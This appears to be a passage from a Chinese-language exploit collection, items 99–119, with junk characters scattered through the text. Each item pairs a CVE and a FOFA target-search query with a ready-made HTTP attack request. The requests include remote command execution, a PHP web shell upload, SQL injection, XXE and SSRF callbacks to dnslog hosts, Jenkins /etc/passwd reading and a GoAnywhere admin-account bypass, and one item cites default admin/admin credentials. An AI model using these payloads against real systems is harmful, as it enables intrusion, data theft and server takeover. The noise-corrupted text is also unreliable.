- r8 x( J! v7 E4 b H: VConnection: close3 X- C. e" G% d' I) ]
Content-Length: 121' h- f9 N' v' X: s$ i; U! g6 @
Accept: */*5 n9 r& ]( U# ~2 n) Y
Accept-Encoding: gzip, deflate( Z$ E: P7 \% X: ?8 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ I- z6 K0 W O; A3 S U
Content-Type: application/x-www-form-urlencoded; charset=UTF-8) B5 G, L4 ?. X% N8 u
X-Requested-With: XMLHttpRequest
* O! l, z! t' |) h/ k0 _
& Q* Y& U0 x* Jid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B+ c* L& T' g7 z
, b) D3 N% T# \3 `
& |+ }! b9 I* V2 n2 k ~: F
99. Ncast盈可视高清智能录播系统busiFacade RCE6 j. a9 |( ]+ I: G3 x
CVE-2024-0305
# Z+ r" g7 n1 p- ]4 A8 ZFOFA:app="Ncast-产品" && title=="高清智能录播系统"
9 ]3 k; J, `9 k- |; g/ {POST /classes/common/busiFacade.php HTTP/1.1
: }6 f2 `2 Q' n; j! |Host: 192.168.40.130:8080; U) L X) K' ~* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- }6 A, s/ J- xConnection: close# g* e6 v9 X* T9 p7 C. r' G) ~
Content-Length: 1540 y% w# S5 E! ~# j1 o
Accept: */*
' i* c# Z: [: I2 I" iAccept-Encoding: gzip, deflate* E* M9 O1 c+ e( H8 L3 E% i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) l; `8 p, s& Q/ N/ A9 ~% EContent-Type: application/x-www-form-urlencoded; charset=UTF-8
! n* w' k3 t" Y1 ]( \6 c' z; YX-Requested-With: XMLHttpRequest! e1 f+ F9 |* e8 q4 ~ s0 \( ~' }
. x+ F8 U4 ]. f9 L' J
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
% g$ }7 B! ?2 q% c- G; {! l# C8 Q+ j# }' [. F# G v" O( g+ V
9 B/ G) f. M1 Q9 ~100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传8 d' c/ U+ B& U) z0 m7 T# G
CVE-2024-0352
6 c. I; N+ n( m& S+ hFOFA:icon_hash="874152924"
- x# L: Q8 b- F% ~ V0 e& GPOST /api/file/formimage HTTP/1.16 L, U- {3 `7 g: M' Y- _8 r" U, E
Host: 192.168.40.130
* L5 [9 Y: P7 E {. ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ X- J# M: j* FConnection: close6 V- l8 N5 M. k7 e7 x' m' Y# d
Content-Length: 201
& a: h% l( ?/ M% `Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei0 j8 T. D* P& c( {( G
Accept-Encoding: gzip# F/ I U( g, F7 C' Y1 t
" P5 ]& V+ h# P0 j2 M0 F7 a7 O
------WebKitFormBoundarygcflwtei
% r5 v7 K6 [. h5 o! {0 T9 NContent-Disposition: form-data; name="file";filename="IE4MGP.php"
" Q2 r) c* d- q V) i6 ^2 D$ K, t4 UContent-Type: application/x-php
7 q% e$ [3 r8 w
$ w; b w& q+ M8 O2ayyhRXiAsKXL8olvF5s4qqyI2O
* B6 I3 z2 h' V7 ^# e e; e2 y------WebKitFormBoundarygcflwtei--) r) Q% L* p4 m5 ?: g3 R
; N1 C9 k( E4 L2 B" K
! P; b3 Q4 P# q: E$ }+ M
101. ivanti policy secure-22.6命令注入
+ m+ P8 Q) U" B/ H0 XCVE-2024-21887
- U$ U- _% \/ jFOFA:body="welcome.cgi?p=logo"
@* B+ R% N& R0 r( KGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
9 M% l' Q8 b) J& a8 K5 QHost: x.x.x.xx.x.x.x1 Z2 X7 q5 O a) L2 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. ` l5 V8 f- m' f6 a( f+ {" W
Connection: close
4 ^' r: J+ \" x' r) ]2 J/ { v: FAccept-Encoding: gzip( ~4 b/ o9 |! u. L3 v6 t2 w- A- ^
3 |+ U# F9 ]2 l9 E' O# N
2 \$ r" r8 M4 H( ]5 W9 j102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 @; M) A/ X; _- J+ l* Z
CVE-2024-21893% A! d9 f- N! s: j+ [: N7 d: X
FOFA:body="welcome.cgi?p=logo"
( a' T, D Z! CPOST /dana-ws/saml20.ws HTTP/1.1/ E* }; @% G9 E: I) Q
Host: x.x.x.x0 F, N# ]8 @% [% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* y+ h# w$ n0 d% o) i: U
Connection: close
7 Q. M* z0 B. F+ T0 n1 `/ iContent-Length: 792* _# }- |6 a: Q/ g
Accept-Encoding: gzip7 k1 [8 }# C; R+ l
: n" } K: a0 f" u+ e8 {<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
9 `8 e' E% H! o# w: x& V
1 [: S) s; a: R* |% m103. Ivanti Pulse Connect Secure VPN XXE
% Q8 q- ~. ^7 Q! V2 ZCVE-2024-22024* w' ]) Q$ Y* Z9 Y: `" U8 s
FOFA:body="welcome.cgi?p=logo"
/ b0 v p5 ] Z- a0 y: e; f) APOST /dana-na/auth/saml-sso.cgi HTTP/1.1. {$ T3 I, y5 |. W- s1 A
Host: 192.168.40.130:111
# f* L% e5 l* b0 q4 `) q8 zUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( F, E) i: E5 b) J8 R$ c& q
Connection: close0 R* o+ `) ^ a6 A' G
Content-Length: 204. T2 Z. X1 N7 f/ Y) Z- O
Content-Type: application/x-www-form-urlencoded
) k3 J; B* B9 C6 SAccept-Encoding: gzip: s# t1 A L/ \& s q0 y* z
$ H) E6 r" B1 @7 \# b( NSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==7 }; o7 U' f# H0 F
* X/ F4 |. T+ m' C5 L7 D) v! G& _& I7 m
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下0 W$ H2 O2 ]3 V5 ?! T6 @5 ^
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>/ h# r8 A9 s4 E/ A
" X7 z0 Y8 p& x8 E5 b7 z
3 L z9 U3 A; S8 }# a4 }
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
2 y$ f0 w% i+ d3 K( xCVE-2024-0569
, j; j: h1 J9 X# `! A7 dFOFA:title="TOTOLINK"
- M. O% o9 a0 A6 ^# {9 h, ]POST /cgi-bin/cstecgi.cgi HTTP/1.1; E$ V& o5 M2 h: l3 W
Host:192.168.0.1$ `7 B7 L- w' l N. `
Content-Length:417 z- \; _" K( D) k* K
Accept:application/json,text/javascript,*/*;q=0.01+ p _' @' b7 p* c, P9 {/ E
X-Requested-with: XMLHttpRequest7 c# i2 \, C. C% X
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
0 U# i1 b) ~0 H% Y9 pContent-Type: application/x-www-form-urlencoded:charset=UTF-8- Q' k7 m+ O7 B' a
Origin: http://192.168.0.1
0 E( @, Y$ C+ J$ ~+ E% E% h; h) k kReferer: http://192.168.0.1/advance/index.html?time=1671152380564 e z' Y0 i5 }) O- L x# ?8 u; P% M
Accept-Encoding:gzip,deflate5 M: D% S+ z' A, ?* w
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
# t4 k, m$ z8 |0 r- gConnection:close
* E k2 Z: _# x% Q7 @
7 }7 U! I3 W- r. {1 o k{
R8 v$ U4 q; M2 B5 I, J"topicurl":"getSysStatusCfg",
1 O0 o* ]. v, r9 M: I: U% E3 h"token":""' N; P& G+ ~4 e& G$ @: _
}
+ |0 q) W$ _. ^, v& b
; }$ y$ s* D, j6 s6 |105. SpringBlade v3.2.0 export-user SQL 注入* Y4 b+ S4 M9 n9 W2 {
FOFA:body="https://bladex.vip"
: U. G) k( ~# n1 V, K6 d5 W: o' I, Ghttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
7 \6 o9 D4 g S8 F" i
) _0 `7 }5 B6 C: Q% n106. SpringBlade dict-biz/list SQL 注入
W4 V) M: ]5 M, P/ k; `0 vFOFA:body="Saber 将不能正常工作"
. H R, k% ~8 S3 x4 oGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1* i2 y! E- C! Y) i
Host: your-ip+ _+ a5 ?1 C' L) G9 W% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 A, u$ i& J5 Q) f- l- B
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A3 i5 d' r2 h O8 S) h+ a
Accept-Encoding: gzip, deflate# `5 }! s Z' i5 i/ b9 a* [! n
Accept-Language: zh-CN,zh;q=0.9
+ u' _0 r; [$ f: Z t. s( rConnection: close
h. e) Y, ?( O# ^2 M' ~0 k4 M0 F; H- F! U0 @3 I& m9 f
% ~& P7 M r$ a G' \7 G9 o# h
107. SpringBlade tenant/list SQL 注入" U: S3 o* E+ F' t3 O# ]1 S
FOFA:body="https://bladex.vip"
( x7 P1 c! o8 h' vGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 [( u6 o3 @! N+ a6 a4 k4 \Host: your-ip
2 Q* K/ A$ I( G$ ~' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! ^. z+ m1 C& ^; f0 w7 P! x
Blade-Auth:替换为自己的
: F1 P/ A4 A; a1 z% t7 {Connection: close. m( C4 M% t7 W/ U* z
6 E% A; N; Z( p2 t$ ~$ Z* _1 r! p
108. D-Tale 3.9.0 SSRF
1 i; W% ]# Q0 {! ]* vCVE-2024-21642
& c# a9 \3 p+ ^/ v- }" d ZFOFA:"dtale/static/images/favicon.png", a2 U: r& c6 r" W
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
; y3 x1 G2 h; fHost: your-ip
7 d% D! V; T+ O9 E. Z& g5 q* WAccept: application/json, text/plain, */*
3 f+ ^/ @$ P4 x9 }8 i. m) xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: X& F; ?, u( ~
Accept-Encoding: gzip, deflate8 \: z6 N9 r! J- X
Accept-Language: zh-CN,zh;q=0.9,en;q=0.81 j( v! k/ }, m, m' w
Connection: close
4 h3 a% M/ L& A" m2 V' w8 o
7 F$ o0 M1 i$ @ I( Y& V) }7 k2 Z# Y
109. Jenkins CLI 任意文件读取
- h. u- w H9 W4 q% WCVE-2024-23897$ Z5 d. {' ~: q! c' h6 ~. `
FOFA:header="X-Jenkins"! Q t: V8 q1 [6 G) F: e" r
POST /cli?remoting=false HTTP/1.1
: I# L. ]2 a" R/ OHost:
; d3 \% K. b5 t8 V, m& U! p0 oContent-type: application/octet-stream
1 J9 [3 y$ v% J3 \/ Q' |Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
' b ~) j3 j/ A7 l- x8 m- B8 S4 uSide: upload
/ r. ?4 ~, _6 v) R @2 _0 H% yConnection: keep-alive
) w2 N( Y8 ^7 X, D: xContent-Length: 163, B/ z4 C! I) U. W
8 H* h& D3 P! G U8 D) L6 s: @ V5 i
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
7 p5 ~2 [9 v0 D" w1 g5 n3 {; h( p1 E& P4 z1 g
/ h" e: _- }- pPOST /cli?remoting=false HTTP/1.14 J; c4 {; ?# O0 i X
Host:
8 q, u: v* @) ]# TSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e927 m# \ P6 b6 y g( D; A. ^
download
6 E# ?5 [1 r) m: L" xContent-Type: application/x-www-form-urlencoded
" ]/ m, l2 x' G* `Content-Length: 0+ a9 e% o3 p/ X( A& _
1 X" j$ S- ]* f* b. ~
. K! E. @& I/ C$ R
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin9 _& V. s$ `. _" @
java -jar jenkins-cli.jar help7 T/ z/ y, x/ v; x( t
[COMMAND]
3 N! j1 c, I# U, U* c' ILists all the available commands or a detailed description of single command. E% q- h* H! e5 r: J; g
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' n% Z* s$ x; c* f/ i* W0 E% y6 u5 J
% l& B7 t. C" R' ]7 p) [, y
110. Goanywhere MFT 未授权创建管理员9 j$ x% A( V" O' q. E# V5 s
CVE-2024-0204) D" n% k/ O1 S/ z3 |, `2 r3 i1 I
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
+ X( x* l' l% K) B; y0 c! `7 U7 |GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
7 G' L$ \4 V/ L% `8 O) y9 l5 eHost: 192.168.40.130:80008 _) U7 C2 T6 I5 R0 j0 |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36+ I9 I1 h6 w( X4 V( w
Connection: close
7 N9 g4 R; E! m4 l9 K% t6 c' [ AAccept: */*" U: ^3 b0 j+ p9 N
Accept-Language: en
; ~0 t3 V+ [9 @0 a6 wAccept-Encoding: gzip
, P n3 h& R7 q0 M; h" W5 b1 C0 r6 H; y: a0 t3 W# Y1 R
* j# e' T& K8 ^. i- J4 F
111. WordPress Plugin HTML5 Video Player SQL注入: P2 a. O5 k/ P& D+ P
CVE-2024-1061
% s; T C* s+ X1 E, LFOFA:"wordpress" && body="html5-video-player"0 ~6 s5 g1 r( X: X x8 Z, ?2 v
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1- w- x5 q0 \+ S3 F; ~# V
Host: 192.168.40.130:112* f! C. ]0 n1 h5 h% F2 R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 ~: M- ^4 x. s+ s- LConnection: close4 [( y1 v* O/ b* Z' N% Y
Accept: */*1 ?+ G: n; P6 _. }1 O
Accept-Language: en
2 O$ e! }1 J! d" ?+ w& QAccept-Encoding: gzip
1 l. e8 }5 ^/ q: T
' e$ X/ o' O' q x7 }: H) i; r
- Z' J; S" Q# c112. WordPress Plugin NotificationX SQL 注入0 c8 _7 [0 t+ g
CVE-2024-1698
! S( S! ], Z- q6 _/ g% xFOFA:body="/wp-content/plugins/notificationx"
; n( [4 B& H# {% c3 k# jPOST /wp-json/notificationx/v1/analytics HTTP/1.1
- I2 Z' `' ?! z& B9 VHost: {{Hostname}} r. A% \. x5 y" i0 p5 _1 R
Content-Type: application/json, P! K2 [) b) D/ o a* d/ `
* G9 j4 X) N4 S3 ?7 x+ V! e( Y% h
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
0 [& g% x s6 w( W
3 `- _- b# G+ L! T. H
4 x, I g4 Q6 P. |113. WordPress Automatic 插件任意文件下载和SSRF
# n& h! B; Z! JCVE-2024-279549 A, L" p5 x4 m$ O
FOFA:"/wp-content/plugins/wp-automatic"
7 P( T$ M% m. F% i+ |GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
: \5 I# v( ~$ j) v, N- bHost: x.x.x.x# O# f! X6 Z3 o) v \
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 ^1 d8 s% o, J- f0 I$ D; P% PConnection: close
; C; \% w" X( O' y5 @7 z! cAccept: */*2 ]5 w7 e; F7 O9 _. _2 Q& t$ ?
Accept-Language: en' N( S2 w# I, @0 ] O: B' p* m8 p) w
Accept-Encoding: gzip
1 Q4 ^+ p. J b% @3 w0 N# p* i9 g. r; `0 p% ?, j) q
O8 o5 G5 w: Y( z$ G; ?' D114. WordPress MasterStudy LMS插件 SQL注入
# @- R3 k( x9 Q/ l- u/ eFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
% a1 y* U# o5 f; BGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
+ @, Q& _8 R6 W2 uHost: your-ip0 k+ x: c3 ~+ w) w" @, J+ w
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 C& y" H5 s/ m) J
Accept-Charset: utf-8
- d& i- F0 o+ {8 X7 M- qAccept-Encoding: gzip, deflate9 G9 A9 s* ^' A5 Z# _8 M/ r
Connection: close
( C+ p5 b7 c: x, n6 b! w: A5 g
+ a6 H, Z; [# z# }# e& p- u4 d5 T8 \; P4 L" a1 L& ^+ Z6 Y- k" {1 H
115. WordPress Bricks Builder <= 1.9.6 RCE
1 U* F# Z- g, J# s$ _# |CVE-2024-25600
, N) s$ C2 ]2 PFOFA: body="/wp-content/themes/bricks/"" G+ R8 V( w* q) ~
第一步,获取网站的nonce值
; @' Q6 ]& I/ g" }GET / HTTP/1.1
6 ]1 I( ]/ K' D R XHost: x.x.x.x; K" s0 w8 j' J: }; G" K
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36' u$ `7 |4 I i
Connection: close( M7 _' Z8 A c+ T# Q
Accept-Encoding: gzip3 i1 t' ~. M$ D, j( }
6 x( h0 u+ V! m( E# A& u/ r, M: P9 @ `4 Y
第二步替换nonce值,执行命令4 ^+ q8 N9 E2 [ @, D" u
POST /wp-json/bricks/v1/render_element HTTP/1.1
6 q/ T9 F! M. Q) a, k0 bHost: x.x.x.x3 _/ x- r$ V# B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 {2 o+ e8 o8 `9 \8 xConnection: close* j3 M. O( f% J/ K r
Content-Length: 356
6 q( \# I4 j8 j5 ^* [# T. yContent-Type: application/json8 `3 ?1 Y3 J$ H
Accept-Encoding: gzip
- L4 Y7 H q+ m0 w: b( A# u% h c ?8 z5 h+ {' @
{5 Y( y- ?/ ]- i+ o
"postId": "1",! n7 S: S6 b6 I* A
"nonce": "第一步获得的值",2 }* H- m& J9 q. ~/ @* a
"element": {# P# J. m* `( S4 J/ G$ f7 s( m
"name": "container",
' @3 O. B/ R* j- O3 j# W "settings": {) \0 h: Q! T$ g$ ^( p+ D
"hasLoop": "true",
2 H! Q1 b# o: X: ?2 X "query": {" V5 a* w8 T& f
"useQueryEditor": true,
' T P: H3 l% P# t! l! H: b "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
/ b) G0 U% }3 C" `/ O I" w "objectType": "post". T* m! a9 C1 |& ^
}
( l" N2 X7 S/ l7 k+ W0 } }" X; R0 _. B, f$ i7 Y; f8 `
}# H' `6 _" v( n5 G5 {( m
}
2 R8 d/ e% R+ g
: K5 f8 b* S% H Q0 Z% G
% v! H9 y# ~9 L* ?, g116. wordpress js-support-ticket文件上传
( o7 V& s" ]$ L N$ g, U. G' C( j: r! |FOFA:body="wp-content/plugins/js-support-ticket". K8 i# s4 m- C, K9 L. [
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1% x# v6 n* i6 k7 m1 b7 S
Host:0 ~1 D, n0 p5 x
Content-Type: multipart/form-data; boundary=--------7670991716 d0 a5 _! j; B5 p8 @
User-Agent: Mozilla/5.0
' b3 U1 Z# @6 ]* x; G4 [- [: P" D l0 T9 C
----------767099171
# n& s1 F! ?- H- GContent-Disposition: form-data; name="action"
& s, Q; ^# }8 |- n1 @: K. Nconfiguration_saveconfiguration0 J3 y( J% A" h& w
----------767099171
( v, H7 p/ d/ n5 BContent-Disposition: form-data; name="form_request"1 x2 X# m* a" o. V) G& [8 y
jssupportticket* P4 U9 m0 U8 T0 c0 \
----------767099171
: ~" p0 l! r. h1 D$ J; _Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"/ l1 ?2 A: D( b Q( {0 a
Content-Type: image/png
8 M2 u$ e0 D( ~: g# A+ @: ]& l----------767099171--) W5 P2 b0 X! R* |
$ D5 k" {; c" o" ?2 e! k& e& `
) d' e+ g/ Z& W* _: A
117. WordPress LayerSlider插件SQL注入
- e* S( P3 u8 |* E$ i' f, f+ V! Tversion:7.9.11 – 7.10.0
" [ ? T/ D3 b% b! H1 M! q. ]FOFA:body="/wp-content/plugins/LayerSlider/"
1 v8 f* B& z5 W3 l1 b! f NGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
, K7 g; X2 z4 Q, ?* E H- THost: your-ip; ?3 q9 V4 F4 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, P7 W3 j" X W/ {5 y% a" u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ e3 x, m2 D$ _$ [$ GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 A n+ k2 R0 r9 JAccept-Encoding: gzip, deflate, br% T1 R# @7 H$ A& o9 c+ i' V
Connection: close, E( P+ c! d9 e: m
Upgrade-Insecure-Requests: 1
: n8 W) b9 F+ x$ J6 B8 ~( A$ v6 `- a4 ?4 F
% t; |+ `" n$ E1 `7 u
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传3 Y5 ]3 ?8 F, v+ T! ^! b$ G
CVE-2024-0939
! o! N. H' n$ aFOFA:title="Smart管理平台"
# v4 B. a. M1 j3 L, q+ gPOST /Tool/uploadfile.php? HTTP/1.18 a; Y/ B$ |( s# l4 V z) W. U% n* X
Host: 192.168.40.130:84431 f; a/ Z: i0 B5 z
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
H* i4 l& T0 C1 c: SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
3 J# w$ \4 U. WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# ~* K) P! k% [( ?1 |7 {% K& \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 g( r# e( D% I0 zAccept-Encoding: gzip, deflate
+ y% F, Y/ Q: _; E4 h) n$ U, rContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887, b: i- b4 c0 w
Content-Length: 405
$ F+ @: y. l. ^4 m3 U/ hOrigin: https://192.168.40.130:84436 n3 L' B9 T9 \
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
4 d3 W0 ~1 G/ {; n7 N: HUpgrade-Insecure-Requests: 1
/ P& m; i# m% [( q0 cSec-Fetch-Dest: document0 h$ ^) [$ y. `/ M( V- S m9 h
Sec-Fetch-Mode: navigate
, C1 `+ j3 ^1 b/ X# s1 { WSec-Fetch-Site: same-origin n. i- D& Z2 y; a6 F
Sec-Fetch-User: ?1
0 L! F/ L1 M }2 N0 }Te: trailers
. p |/ P8 }) ?8 y% Q* dConnection: close' Q; d, ^- \! s
+ \- U4 n7 S5 ?$ M4 r-----------------------------13979701222747646634037182887( j) |& F7 I" d! I
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+ o8 B6 ^5 ~8 b- d- TContent-Type: application/octet-stream6 K& p6 k5 v9 n
1 _1 m9 ~0 J, A9 M' u! e% j<?php* v' ^' F2 K2 \6 l0 U$ Q
system($_POST["passwd"]);
& t# v! v' R: Q4 W# \: p7 S4 X0 ?/ R?>
7 U7 l: Q" J+ N, D0 ? c0 o0 a U-----------------------------13979701222747646634037182887
6 U: g1 p! a6 }' P# ^1 CContent-Disposition: form-data; name="txt_path"" Y$ I' h. }/ x( P9 C9 W: P
" e$ N I# Q7 S- E0 S: \9 H/home/src.php8 J5 M9 U2 }8 n: e& o; W5 }
-----------------------------13979701222747646634037182887--2 d* P* E4 E3 H( f/ Y7 I& W+ |
# H4 e& y+ F$ E' B6 @- ^
$ ?, M% t: @: T/ ^& U访问/home/src.php
5 [+ S7 {6 W& s# }# a4 k# {" P" [# _' i- h" I
119. 北京百绰智能S20后台sysmanageajax.php sql注入- A8 j0 C" y i; e, k
CVE-2024-1254( h0 c7 M8 p' i7 i8 [4 G
FOFA:title="Smart管理平台". R$ V& Z& l$ x
先登录进入系统,默认账号密码为admin/admin
# o5 y7 V+ ]/ x1 y4 L( XPOST /sysmanage/sysmanageajax.php HTTP/1.114 S+ o+ i. B: m; F) I/ i
Host: x.x.x.x
7 u$ r( i/ |; qCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee% B6 Y% @ q, [& r. l% {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0+ o6 ^/ B! a7 Y, y
Accept: */*
5 w' @- s! h4 P; E1 q, mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 C6 k! F- W2 G, _5 M
Accept-Encoding: gzip, deflate/ i! M! _. h% [) i& w5 h
Content-Type: application/x-www-form-urlencoded;
: E, ~# H" F: IContent-Length: 109
8 q. F! D) Y& Z, Y4 ]Origin: https://58.18.133.60:8443
: `8 ~, E, Y/ j$ f8 C- F( WReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
' Y+ ^: C( z; tSec-Fetch-Dest: empty
% A0 {9 N! W1 j8 tSec-Fetch-Mode: cors0 D* M) u# W# P. l0 p3 ^
Sec-Fetch-Site: same-origin
# T6 h, |, F; |" H8 i# G/ w% ~X-Forwarded-For: 1.1.1.1$ R$ X- w' _ G4 h
X-Originating-Ip: 1.1.1.1
# }9 y `# ?4 O" J. \1 hX-Remote-Ip: 1.1.1.1
